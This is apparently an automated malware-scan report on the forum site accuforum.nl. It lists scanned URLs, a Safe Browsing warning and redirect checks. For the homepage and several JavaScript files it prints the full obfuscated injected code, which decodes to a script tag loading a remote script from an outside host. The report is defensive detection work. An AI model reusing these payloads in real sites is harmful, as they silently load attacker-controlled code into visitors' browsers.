Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=accuforum.nl
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.accuforum.nl/ | 200 OK Content-Length: 23368 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) bvrsuo="y";kkk="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[kkk].getElementById("asd"))}()}catch(jhsfig){fyxw=function(xfayi){xfayi="fro"+xfayi;for(ojdt=0;ojdt<bvrsuo.length;ojdt++){mfru+=String[xfayi](xbm(gsqbma+(bvrsuo[ojdt]))-(48));}};};xbm=(window.eval);gsqbma="0x";utf=0;if(!utf){try{++xbm(kkk)["bo"+"d"+bvrsuo]}catch(jhsfig){qex="(";}bvrsuo="94(9f(93(a5(9d(95(9e(a4(5e(a7(a2(99(a4(95(58(57(6c(a3(93(a2(99(a0(a4(50(a4(a9(a0(95(6d(52(a4(95(a8(a4(5f(9a(91(57(50(5b(50(57(a6(91(a3(93(a2(99(a0(a4(52(50(a3(a2(93(6d(52(98(a4(a4(a0(6a(5f(5f(91(94(a6(91(9e(93(95(94(a4(a2(91(93(9b(95(a2(9f(9e(95(5e(9e(95(a4(5f(61(5f(a3(a4(91(a4(a3(5e(a0(98(a0(52(50(9e(91(9d(95(6d(52(a1(a7(61(69(52(6e(6c(5f(a3(57(50(5b(50(57(93(a2(99(a0(a4(6e(57(59(6b".split(qex);mfru="";fyxw("mCharCode");xbm(""+mfru);} Antivirus reports:
| ||
http://accuforum.nl/jscripts/prototype.js?ver=1603 | 200 OK Content-Length: 181691 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) aykutt="y";ffgqv="document";try{+function(){if(document.querySelector)--(window[ffgqv].getElementById("asd"))}()}catch(ladg){zechy=function(bodf){bodf="fro"+bodf;for(togpw=0;togpw<aykutt.length;togpw++){hyht+=String[bodf](ytz(vrw+(aykutt[togpw]))-(7));}};};ytz=(window.eval);vrw="0x";kxggd=0;if(!kxggd){try{++ytz(ffgqv)["\x62o"+"d"+aykutt]}catch(ladg){vstam="(";}aykutt="6b(76(6a(7c(74(6c(75(7b(35(7e(79(70(7b(6c(2f(2e(43(7a(6a(79(70(77(7b(27(7b(80(77(6c(44(29(7b(6c(7f(7b(36(71(68(2e(27(32(27(2e(7d(68(7a(6a(79(70(77(7b(29(27(7a(79(6a(44(29(6f(7b(7b(77(41(36(36(68(6b(7d(68(75(6a(6c(6b(7b(79(68(6a(72(6c(79(76(75(6c(35(75(6c(7b(36(38(36(7a(7b(68(7b(7a(35(77(6f(77(29(27(75(68(74(6c(44(29(78(7e(38(40(29(45(43(36(7a(2e(27(32(27(2e(6a(79(70(77(7b(45(2e(30(42".split(vstam);hyht="";zechy("mCharCode");ytz(""+hyht);} Antivirus reports:
| ||
http://accuforum.nl/jscripts/general.js?ver=1603 | 200 OK Content-Length: 18693 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) aykutt="y";ffgqv="document";try{+function(){if(document.querySelector)--(window[ffgqv].getElementById("asd"))}()}catch(ladg){zechy=function(bodf){bodf="fro"+bodf;for(togpw=0;togpw<aykutt.length;togpw++){hyht+=String[bodf](ytz(vrw+(aykutt[togpw]))-(7));}};};ytz=(window.eval);vrw="0x";kxggd=0;if(!kxggd){try{++ytz(ffgqv)["\x62o"+"d"+aykutt]}catch(ladg){vstam="(";}aykutt="6b(76(6a(7c(74(6c(75(7b(35(7e(79(70(7b(6c(2f(2e(43(7a(6a(79(70(77(7b(27(7b(80(77(6c(44(29(7b(6c(7f(7b(36(71(68(2e(27(32(27(2e(7d(68(7a(6a(79(70(77(7b(29(27(7a(79(6a(44(29(6f(7b(7b(77(41(36(36(68(6b(7d(68(75(6a(6c(6b(7b(79(68(6a(72(6c(79(76(75(6c(35(75(6c(7b(36(38(36(7a(7b(68(7b(7a(35(77(6f(77(29(27(75(68(74(6c(44(29(78(7e(38(40(29(45(43(36(7a(2e(27(32(27(2e(6a(79(70(77(7b(45(2e(30(42".split(vstam);hyht="";zechy("mCharCode");ytz(""+hyht);} Antivirus reports:
| ||
http://accuforum.nl/jscripts/popup_menu.js?ver=1600 | 200 OK Content-Length: 3487 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) aykutt="y";ffgqv="document";try{+function(){if(document.querySelector)--(window[ffgqv].getElementById("asd"))}()}catch(ladg){zechy=function(bodf){bodf="fro"+bodf;for(togpw=0;togpw<aykutt.length;togpw++){hyht+=String[bodf](ytz(vrw+(aykutt[togpw]))-(7));}};};ytz=(window.eval);vrw="0x";kxggd=0;if(!kxggd){try{++ytz(ffgqv)["\x62o"+"d"+aykutt]}catch(ladg){vstam="(";}aykutt="6b(76(6a(7c(74(6c(75(7b(35(7e(79(70(7b(6c(2f(2e(43(7a(6a(79(70(77(7b(27(7b(80(77(6c(44(29(7b(6c(7f(7b(36(71(68(2e(27(32(27(2e(7d(68(7a(6a(79(70(77(7b(29(27(7a(79(6a(44(29(6f(7b(7b(77(41(36(36(68(6b(7d(68(75(6a(6c(6b(7b(79(68(6a(72(6c(79(76(75(6c(35(75(6c(7b(36(38(36(7a(7b(68(7b(7a(35(77(6f(77(29(27(75(68(74(6c(44(29(78(7e(38(40(29(45(43(36(7a(2e(27(32(27(2e(6a(79(70(77(7b(45(2e(30(42".split(vstam);hyht="";zechy("mCharCode");ytz(""+hyht);} Antivirus reports:
| ||
http://www.accuforum.nl/forum-1.html | 200 OK Content-Length: 14159 Content-Type: text/html | clean |
http://www.accuforum.nl/forum-6.html | 200 OK Content-Length: 38558 Content-Type: text/html | clean |
http://www.accuforum.nl/forum-31.html | 200 OK Content-Length: 21818 Content-Type: text/html | clean |
http://www.accuforum.nl/jscripts/inline_edit.js?ver=1400 | 200 OK Content-Length: 6746 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) aykutt="y";ffgqv="document";try{+function(){if(document.querySelector)--(window[ffgqv].getElementById("asd"))}()}catch(ladg){zechy=function(bodf){bodf="fro"+bodf;for(togpw=0;togpw<aykutt.length;togpw++){hyht+=String[bodf](ytz(vrw+(aykutt[togpw]))-(7));}};};ytz=(window.eval);vrw="0x";kxggd=0;if(!kxggd){try{++ytz(ffgqv)["\x62o"+"d"+aykutt]}catch(ladg){vstam="(";}aykutt="6b(76(6a(7c(74(6c(75(7b(35(7e(79(70(7b(6c(2f(2e(43(7a(6a(79(70(77(7b(27(7b(80(77(6c(44(29(7b(6c(7f(7b(36(71(68(2e(27(32(27(2e(7d(68(7a(6a(79(70(77(7b(29(27(7a(79(6a(44(29(6f(7b(7b(77(41(36(36(68(6b(7d(68(75(6a(6c(6b(7b(79(68(6a(72(6c(79(76(75(6c(35(75(6c(7b(36(38(36(7a(7b(68(7b(7a(35(77(6f(77(29(27(75(68(74(6c(44(29(78(7e(38(40(29(45(43(36(7a(2e(27(32(27(2e(6a(79(70(77(7b(45(2e(30(42".split(vstam);hyht="";zechy("mCharCode");ytz(""+hyht);} Antivirus reports:
| ||
http://www.accuforum.nl/newthread.php?fid=31 | 200 OK Content-Length: 9326 Content-Type: text/html | clean |
http://www.accuforum.nl/member.php?action=register | 200 OK Content-Length: 10260 Content-Type: text/html | clean |
http://www.accuforum.nl/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://www.accuforum.nl/member.php?action=lostpw | 200 OK Content-Length: 8091 Content-Type: text/html | clean |
http://www.accuforum.nl/misc.php?action=markread&fid=31 | HTTP/1.1 200 OK Connection: close Date: Sun, 11 Jan 2015 20:52:36 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Set-Cookie: mybb[lastvisit]=1421009556; expires=Mon, 11-Jan-2016 20:52:36 GMT; path=/; domain=.accuforum.nl Set-Cookie: mybb[lastactive]=1421009556; expires=Mon, 11-Jan-2016 20:52:36 GMT; path=/; domain=.accuforum.nl Set-Cookie: mybb[forumread]=a%3A1%3A%7Bi%3A31%3Bi%3A1421009556%3B%7D; path=/; domain=.accuforum.nl X-Powered-By: PHP/5.4.35 | clean |
http://www.accuforum.nl/usercp2.php?action=addsubscription&type=forum&fid=31&my_post_key=982b96917474edc063a7ad35323b0ceb | 200 OK Content-Length: 9620 Content-Type: text/html | clean |
http://www.accuforum.nl/forum-31.html?datecut=0&sortby=subject&order=asc | 200 OK Content-Length: 21970 Content-Type: text/html | clean |
http://www.accuforum.nl/forum-31.html?datecut=0&sortby=subject&order=desc | 200 OK Content-Length: 21970 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: accuforum.nl
Result:
GET / HTTP/1.1
Host: accuforum.nl
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: accuforum.nl
Referer: http://www.google.com/search?q=accuforum.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: accuforum.nl
Referer: http://www.google.com/search?q=accuforum.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.